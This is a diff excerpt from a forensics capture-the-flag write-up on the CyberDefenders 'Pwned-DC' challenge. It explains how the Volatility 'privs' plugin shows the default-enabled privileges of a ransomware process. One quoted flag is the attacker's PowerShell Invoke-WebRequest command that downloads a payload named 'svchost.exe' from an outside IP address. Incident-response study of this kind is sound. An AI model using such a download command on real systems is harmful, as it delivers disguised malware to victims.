0xSh3rl0ck/0xSh3rl0ck.github.io/_posts/CTF-WriteUp/2022-07-10-Cyber Defenders - Pwned-DC.md

 Flag : <span style="color: #909090">Invoke-WebRequest http://192.168.112.128:8000/svchost.exe -OutFile svchost.exe</span>

-# #25	Provide the number of ransomware process' privileges that are enabled by default?
+# #25	Provide the number of ransomware process' privileges that are enabled by default.

-First what is process' privileges, Privileges determine the type of system operations that a user account can perform.
+First, what are process' privileges?
+Privileges determine the type of system operations that a user account can perform.
 An administrator assigns privileges to user and group accounts.
-Each user's privileges include those granted to the user and to the groups to which the user belongs. so we can use `privs` volatility plugin to Display process privileges and we can specify the output to only show the PID of the ransomware process which is `3140` with `privs -p 3140` we can also filter the attribute with `Enabled,Default` as asked in the question.
+Each user's privileges include those granted to the user and to the groups to which the user belongs.
+So we can use the `privs` volatility plugin to Display process privileges, and we can specify the output to only show the PID of the ransomware process, which is `3140` with `privs -p 3140`.
+As the question asks, we can also filter the attribute with `Enabled, Default`.

 [![44](/assets/images/CTF-WriteUp/Cyber-Defenders-Pwned_DC/44.PNG)](/assets/images/CTF-WriteUp/Cyber-Defenders-Pwned_DC/44.PNG)